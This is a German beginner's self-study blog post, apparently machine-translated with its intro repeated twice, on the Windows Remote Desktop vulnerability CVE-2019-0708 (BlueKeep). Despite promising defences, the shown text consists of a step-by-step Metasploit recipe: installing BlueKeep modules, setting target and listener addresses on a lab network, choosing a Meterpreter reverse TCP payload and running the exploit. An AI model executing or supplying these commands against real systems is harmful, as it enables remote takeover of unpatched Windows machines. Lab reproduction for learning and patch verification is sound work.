
Dieser Artikel wird die Schwachstelle im Windows-Remotedesktopdienst (CVE-2019-0708) vorstellen und detailliert auf den Exploit sowie die Abwehrmaßnahmen eingehen. Als Anfänger im Bereich Cybersicherheit teile ich einige grundlegende Selbstlern-Tutorials – hauptsächlich Online-Notizen zu Sicherheitstools und praktischen Übungen. Ich hoffe, sie gefallen euch. Noch mehr wünsche ich mir, dass ihr mit mir zusammen übt und Fortschritte macht. Später werde ich mich tiefer mit Netzwerk- und Systemsicherheit befassen und entsprechende Experimente teilen. Kurz gesagt, ich hoffe, diese Artikelserie ist für Blogger hilfreich. Das Schreiben ist nicht leicht, also bitte ich die Profis, keine unnötige Kritik zu äußern, wenn es euch nicht gefällt. Danke!
Dieser Artikel behandelt die Windows Remote Desktop Service Schwachstelle (CVE-2019-0708) und erläutert die Schwachstelle sowie die Abwehrmaßnahmen im Detail. Als Anfänger im Bereich Cybersicherheit teile ich einige grundlegende Tutorials zum Selbststudium, hauptsächlich Online-Notizen zu Sicherheitstools und praktischen Übungen, und hoffe, dass sie Ihnen gefallen. Gleichzeitig hoffe ich, dass Sie mit mir zusammenarbeiten und Fortschritte machen können. In Zukunft werde ich mich eingehend mit Cybersicherheits- und Systemwissen befassen und relevante Experimente teilen. Kurz gesagt, ich hoffe, diese Artikelserie ist für Blog-Freunde hilfreich. Das Schreiben ist nicht einfach, große Meister, bitte nicht meckern, wenn es euch nicht gefällt, danke!
Entsprechende Blogs:
[Cybersicherheit Selbststudium] 58. Windows-Ausnutzung – Erneute Betrachtung von CVE-2019-0708 und Metasploit Reverse Shell
[Cybersicherheit Selbststudium] 44. Windows Remote Desktop Service Schwachstelle (CVE-2019-0708) – Reproduktion und detaillierte Erklärung
Kernbefehle:
# Kopiere Dateien
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
# Starte Tool
msfconsole
reload_all
search 0708
# Verwende Script
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# Zeige Informationen
show options
show targets
info
# Setze Hör-Adresse, Ziel-Adresse, Reverse-Payload, Zieltyp
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3
# Führe Script aus
run
exploit
# Setze Bandbreite
Set GROOMSIZE 40